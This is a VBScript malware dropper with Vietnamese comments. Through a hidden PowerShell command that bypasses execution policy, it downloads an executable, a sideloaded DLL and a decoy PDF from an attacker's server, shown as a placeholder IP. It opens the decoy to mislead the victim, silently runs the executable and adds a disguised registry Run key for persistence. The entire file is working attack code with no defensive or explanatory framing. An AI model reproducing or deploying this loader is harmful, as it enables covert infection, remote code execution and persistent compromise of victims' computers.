Set WshShell = CreateObject("WScript.Shell")
strTemp = WshShell.ExpandEnvironmentStrings("%TEMP%")
IP = "IP_VPS_CUA_BAN"

' Script PowerShell: Tải -> Mở khóa -> Chạy đúng vị trí
' Dùng Unblock-File để Windows cho phép EXE nạp DLL
psCmd = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
"""$t=$env:TEMP; " & _
"iwr 'http://" & IP & "/app.exe' -OutF '$t\app.exe'; " & _
"iwr 'http://" & IP & "/vinh.dll' -OutF '$t\vinh.dll'; " & _
"iwr 'http://" & IP & "/decoy.pdf' -OutF '$t\decoy.pdf'; " & _
"Unblock-File -Path '$t\app.exe'; Unblock-File -Path '$t\vinh.dll'; " & _
"Start-Process '$t\decoy.pdf'; " & _
"Start-Process -FilePath '$t\app.exe' -WorkingDirectory '$t'; " & _
"New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsGraphics' -Value '$t\app.exe' -PropertyType 'String' -Force"""

WshShell.Run psCmd, 0, False
